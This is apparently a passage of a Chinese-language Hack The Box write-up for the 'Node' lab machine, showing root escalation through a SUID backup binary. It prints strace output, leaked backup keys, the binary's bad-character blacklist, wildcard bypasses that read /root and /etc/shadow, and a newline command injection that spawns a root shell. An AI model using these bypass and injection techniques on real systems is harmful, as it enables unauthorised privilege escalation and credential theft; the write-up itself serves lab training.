kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
[...pass...]
将上面的一串base64写入到文件中,然后跟之前操作一样,进行解码输出
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat b.txt | base64 -d > b.zip
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file b.zip
b.zip: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ unzip b.zip
Archive: b.zip
skipping: root.txt need PK compat. v5.1 (can do v4.6)
搜了一下这个报错,网上建议使用7z进行解压
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ 7z x b.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs LE)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: b.zip
--
Path = b.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat root.txt
以外拿到flag了?wrong!只是一个陷阱,有兴趣自己看一下。😆
把backup下载到本地,进行分析;
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ scp mark@10.10.10.58:/usr/local/bin/backup .
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file backup
backup: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
tom@node:/tmp$ strace -o backup.txt backup
strace -o backup.txt backup
tom@node:/tmp$ cat backup.txt
cat backup.txt
execve("/usr/local/bin/backup", ["backup"], [/* 14 vars */]) = 0
brk(NULL) = 0x90a9000
fcntl64(0, F_GETFD) = 0
fcntl64(1, F_GETFD) = 0
fcntl64(2, F_GETFD) = 0
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf77fb000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31341, ...}) = 0
mmap2(NULL, 31341, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf77ce000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib32/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\207\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1775464, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf77cd000
mmap2(NULL, 1784348, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7619000
mprotect(0xf77c6000, 4096, PROT_NONE) = 0
mmap2(0xf77c7000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad000) = 0xf77c7000
mmap2(0xf77ca000, 10780, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf77ca000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7618000
set_thread_area({entry_number:-1, base_addr:0xf7618700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0xf77c7000, 8192, PROT_READ) = 0
mprotect(0x804b000, 4096, PROT_READ) = 0
mprotect(0xf77fc000, 4096, PROT_READ) = 0
munmap(0xf77ce000, 31341) = 0
geteuid32() = 1000
setuid32(1000) = 0
exit_group(1) = ?
+++ exited with 1 +++
wp思路1
https://0xstarlight.github.io/posts/HTB-Node-Writeup/#recon
Backup SUID
我们之前发现的 api.js 上生成备份。
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
它需要三个参数:-q,然后是备份密钥和目录名。让我们使用 strace 运行文件来检查发生了什么。
tom@node:/$ strace /usr/local/bin/backup a a a
在文件的末尾,我们可以注意到它正在尝试读取“/etc/myplace/keys”文件的内容。
[SNIP...]
) = 81
write(1, "\n", 1
) = 1
open("/etc/myplace/keys", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=196, ...}) = 0
read(3, "a01a6aa5aaf1d7729f35c8278daae30f"..., 4096) = 196
read(3, "", 4096) = 0
write(1, " \33[33m[!]\33[37m Ah-ah-ah! You did"..., 57 [!] Ah-ah-ah! You didn't say the magic word!
) = 57
[SNIP...]
读取文件内容后,我们可以看出它包含一些密钥。也许我们可以使用这些密钥并读取根目录?
tom@node:/$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
Read Flag only [ Path I ]
尝试读取根目录文件夹。
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
可以使用与上次相同的密码来破解 zip 并读取数据。
0xStarlight@kali$ cat unknown | base64 -d > unknown.zip
0xStarlight@kali$ unzip unknown.zip
0xStarlight@kali$ cat root.txt
没那么容易,你将收获一个这个
让我们在输入参数时在 /root 中不使用 / 的情况下再次尝试。
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 root
这次它有更多的输出。让我们执行与之前相同的步骤,提取文件,然后读取文件的内容。
0xStarlight@kali$ unzip decode.zip
Archive: decode1.zip
creating: root/
[decode1.zip] root/.profile password:
inflating: root/.profile
inflating: root/.bash_history
creating: root/.cache/
extracting: root/.cache/motd.legal-displayed
extracting: root/root.txt
inflating: root/.bashrc
inflating: root/.viminfo
creating: root/.nano/
extracting: root/.nano/search_history
看起来我们有 root.txt 🥳。但这还没有结束。我们没有shell。
Wild Characters [ Path - II ]
将此文件传输到我们的本地主机并在 binaryninja 上分析该文件。在反汇编 Graph 视图中打开 main 函数。
向下滚动后,我们可以看到它有 /root 作为一个坏字符,导致troll ASCII Art。
进一步向下滚动,我们可以得到它不允许的所有坏字符的列表。
-
..
如果我们继续这样做,我们会发现所有坏字符。
Bad chars : .. /root ; & ` $ | /etc // / etc
查看我们的坏字符列表,我们没有 * 或 ~ 符号。我们可以使用它来绕过和读取 /root 目录文件和内容。例如,如果我们在本地机器上执行以下命令。
$ cd ~
$ cd r**t
$ cd r??t
我们将返回到我们的主目录,因为没有其他目录可以返回到。因此我们可以这样读取根标志。让我们试试看。
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /r**t/roo*.txt
This gives us the root.txt
file content.
我们可以执行与提权 1 相同的步骤来提取文件并检索标志。我们也可以尝试读取 /etc/passwd 文件然后尝试破解它,然后在机器上以 root 身份 SSH。
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "/e*c/shado*" ; echo
通过上述相同的方法提取文件,然后我们可以读取影子文件根哈希。
Command Injection [ Path-III ]
在反汇编 Graph 视图中打开 main 函数。如果参数正确,向下滚动到执行 zip 命令的部分。
这里我们可以看到它有压缩数据的exec命令,在它下面,我们还可以看到它调用了系统;这意味着我们可以在新行的帮助下对第三个参数进行命令注入并获得 root 权限,它也不是一个坏字符。现在让我们看看如何进行命令注入。
在 ELF Linear View 中打开 main 函数。如果我们输入正确的魔法词,我们可以看到一条命令被执行。它会将文件内容压缩为 base64,并在屏幕上显示给我们。
"/usr/bin/zip -r -P magicword %s %s > /dev/null"
根据命令,我们可以看到它接受最后一个参数并将其推送到 /dev/null。因此,该命令不会执行它。所以我们可以尝试执行 /bin/bash 并获得 root shell!我们可以像这样进行命令注入。
"randomblahbla
/bin/bash
randomblahba"
我们不能在第一个参数中执行命令注入,因为它对 / 但对新行上的字符没有错误的字符检查,我们不能把它放在最后,因为它会被刷新到 /dev/null。
让我们试试看
文章来源:https://www.toymoban.com/news/detail-446790.html
BOF [ Path - IV ]
A really good blog is written for this method of priv esc https://rastating.github.io/hackthebox-node-walkthrough/文章来源地址https://www.toymoban.com/news/detail-446790.html
参考文章:
- https://www.runoob.com/mongodb/mongodb-tutorial.html
- https://0xstarlight.github.io/posts/HTB-Node-Writeup/#recon
End
到了这里,关于HTB靶机011-Node-WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!